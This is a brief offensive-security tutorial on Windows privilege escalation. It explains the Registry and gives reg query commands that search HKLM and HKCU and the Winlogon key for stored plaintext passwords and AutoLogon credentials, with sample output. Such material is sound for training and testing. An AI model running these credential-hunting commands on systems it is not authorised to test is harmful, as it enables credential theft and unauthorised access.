Attacks - Windows Privilege Escalation

Registry - Passwords

What is Registry?

The Windows Registry is like a big database that the operating system uses to store information about the system, software, hardware, user preferences, and settings. Itโ€™s essential for Windows to function properly and is often called the โ€œbrainโ€ of Windows configuration.

Enumeration

to search for passwords in registry you could use the reg command:

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s
  • HKLM: Refers to the HKEY_LOCAL_MACHINE root key (system-wide settings).
  • HKCU: Refers to the HKEY_CURRENT_USER root key (user-specific settings).
  • /f password: Searches for registry keys, values, or data that include the keyword password.
  • /t REG_SZ: Limits the search to registry values of type string (REG_SZ).
  • /s: Recursively searches all subkeys and values.

Output example:

HKEY_LOCAL_MACHINE\SOFTWARE\SomeApp
    Password    REG_SZ    P@ssw0rd123

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    MySecretPass

or we could query a key for passwords too:

query this specific key to find admin AutoLogon credentials.

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"